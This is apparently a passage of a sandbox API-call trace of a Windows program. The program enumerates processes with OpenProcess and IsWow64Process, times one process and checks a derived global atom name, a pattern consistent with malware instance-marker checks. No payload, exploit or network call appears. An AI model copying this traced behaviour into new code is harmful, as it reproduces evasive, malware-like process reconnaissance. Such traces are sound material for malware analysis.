	[0094.811] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.811] CloseHandle (hObject=0x248) returned 1
	[0094.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0094.812] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.812] CloseHandle (hObject=0x248) returned 1
	[0094.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0094.812] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.812] CloseHandle (hObject=0x248) returned 1
	[0094.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0094.812] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.812] CloseHandle (hObject=0x248) returned 1
	[0094.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0094.812] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.812] CloseHandle (hObject=0x248) returned 1
	[0094.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0094.812] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.812] CloseHandle (hObject=0x248) returned 1
	[0094.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0094.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0094.813] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.813] CloseHandle (hObject=0x248) returned 1
	[0094.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0094.813] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.813] CloseHandle (hObject=0x248) returned 1
	[0094.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0094.813] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.813] CloseHandle (hObject=0x248) returned 1
	[0094.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0094.813] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.813] CloseHandle (hObject=0x248) returned 1
	[0094.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0094.813] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.813] CloseHandle (hObject=0x248) returned 1
	[0094.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0094.814] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.814] CloseHandle (hObject=0x248) returned 1
	[0094.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0094.814] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.814] CloseHandle (hObject=0x248) returned 1
	[0094.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0094.814] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.814] CloseHandle (hObject=0x248) returned 1
	[0094.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0094.814] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.814] CloseHandle (hObject=0x248) returned 1
	[0094.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0094.814] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.814] CloseHandle (hObject=0x248) returned 1
	[0094.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0094.814] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.815] CloseHandle (hObject=0x248) returned 1
	[0094.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0094.815] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.815] CloseHandle (hObject=0x248) returned 1
	[0094.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0094.815] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.815] CloseHandle (hObject=0x248) returned 1
	[0094.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0094.815] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.815] CloseHandle (hObject=0x248) returned 1
	[0094.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0094.815] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.815] CloseHandle (hObject=0x248) returned 1
	[0094.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0094.815] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.816] CloseHandle (hObject=0x248) returned 1
	[0094.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0094.816] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.816] CloseHandle (hObject=0x248) returned 1
	[0094.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0094.816] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.816] CloseHandle (hObject=0x248) returned 1
	[0094.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0094.816] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.816] CloseHandle (hObject=0x248) returned 1
	[0094.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0094.816] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.816] CloseHandle (hObject=0x248) returned 1
	[0094.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0094.816] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.816] CloseHandle (hObject=0x248) returned 1
	[0094.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0094.817] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.817] CloseHandle (hObject=0x248) returned 1
	[0094.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.817] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.817] CloseHandle (hObject=0x248) returned 1
	[0094.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.817] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.817] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0094.817] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0094.818] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0094.818] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.818] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0094.818] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.818] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0094.818] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0094.818] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0094.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0094.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0094.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0094.819] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.819] CloseHandle (hObject=0x248) returned 1
	[0094.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0094.819] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.819] CloseHandle (hObject=0x248) returned 1
	[0094.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0094.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0094.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0094.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0094.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0094.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0094.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0094.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0094.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0094.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0094.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0094.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0094.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0094.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0094.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0094.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0094.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0094.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0094.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0094.893] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.893] CloseHandle (hObject=0x248) returned 1
	[0094.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0094.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0094.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0094.894] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.894] CloseHandle (hObject=0x248) returned 1
	[0094.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0094.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0094.894] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.894] CloseHandle (hObject=0x248) returned 1
	[0094.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0094.894] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.894] CloseHandle (hObject=0x248) returned 1
	[0094.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0094.894] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.894] CloseHandle (hObject=0x248) returned 1
	[0094.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0094.895] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.895] CloseHandle (hObject=0x248) returned 1
	[0094.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0094.895] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.895] CloseHandle (hObject=0x248) returned 1
	[0094.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0094.895] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.895] CloseHandle (hObject=0x248) returned 1
	[0094.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0094.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0094.895] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.895] CloseHandle (hObject=0x248) returned 1
	[0094.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0094.895] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.896] CloseHandle (hObject=0x248) returned 1
	[0094.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0094.896] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.896] CloseHandle (hObject=0x248) returned 1
	[0094.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0094.896] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.896] CloseHandle (hObject=0x248) returned 1
	[0094.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0094.896] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.896] CloseHandle (hObject=0x248) returned 1
	[0094.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0094.896] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.896] CloseHandle (hObject=0x248) returned 1
	[0094.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0094.896] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.896] CloseHandle (hObject=0x248) returned 1
	[0094.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0094.897] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.897] CloseHandle (hObject=0x248) returned 1
	[0094.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0094.897] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.897] CloseHandle (hObject=0x248) returned 1
	[0094.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0094.897] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.897] CloseHandle (hObject=0x248) returned 1
	[0094.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0094.897] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.897] CloseHandle (hObject=0x248) returned 1
	[0094.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0094.897] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.897] CloseHandle (hObject=0x248) returned 1
	[0094.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0094.898] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.898] CloseHandle (hObject=0x248) returned 1
	[0094.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0094.898] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.898] CloseHandle (hObject=0x248) returned 1
	[0094.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0094.898] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.898] CloseHandle (hObject=0x248) returned 1
	[0094.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0094.898] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.898] CloseHandle (hObject=0x248) returned 1
	[0094.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0094.898] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.898] CloseHandle (hObject=0x248) returned 1
	[0094.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0094.898] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.899] CloseHandle (hObject=0x248) returned 1
	[0094.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0094.899] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.899] CloseHandle (hObject=0x248) returned 1
	[0094.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0094.899] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.899] CloseHandle (hObject=0x248) returned 1
	[0094.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0094.899] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.899] CloseHandle (hObject=0x248) returned 1
	[0094.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0094.899] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.899] CloseHandle (hObject=0x248) returned 1
	[0094.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.899] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.899] CloseHandle (hObject=0x248) returned 1
	[0094.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.900] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.900] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0094.900] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0094.900] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0094.900] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.900] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0094.901] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.903] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0094.903] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0094.903] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0094.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0094.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0094.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0094.904] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.904] CloseHandle (hObject=0x248) returned 1
	[0094.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0094.904] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.904] CloseHandle (hObject=0x248) returned 1
	[0094.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0094.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0094.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0094.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0094.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0094.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0094.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0094.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0094.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0094.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0094.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0094.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0094.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0094.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0094.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0094.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0094.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0094.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0094.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0094.977] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.977] CloseHandle (hObject=0x248) returned 1
	[0094.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0094.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0094.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0094.977] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.977] CloseHandle (hObject=0x248) returned 1
	[0094.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0094.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0094.977] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.977] CloseHandle (hObject=0x248) returned 1
	[0094.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0094.978] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.978] CloseHandle (hObject=0x248) returned 1
	[0094.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0094.978] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.978] CloseHandle (hObject=0x248) returned 1
	[0094.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0094.978] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.978] CloseHandle (hObject=0x248) returned 1
	[0094.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0094.978] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.978] CloseHandle (hObject=0x248) returned 1
	[0094.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0094.979] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.979] CloseHandle (hObject=0x248) returned 1
	[0094.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0094.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0094.979] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.979] CloseHandle (hObject=0x248) returned 1
	[0094.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0094.979] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.979] CloseHandle (hObject=0x248) returned 1
	[0094.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0094.979] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.979] CloseHandle (hObject=0x248) returned 1
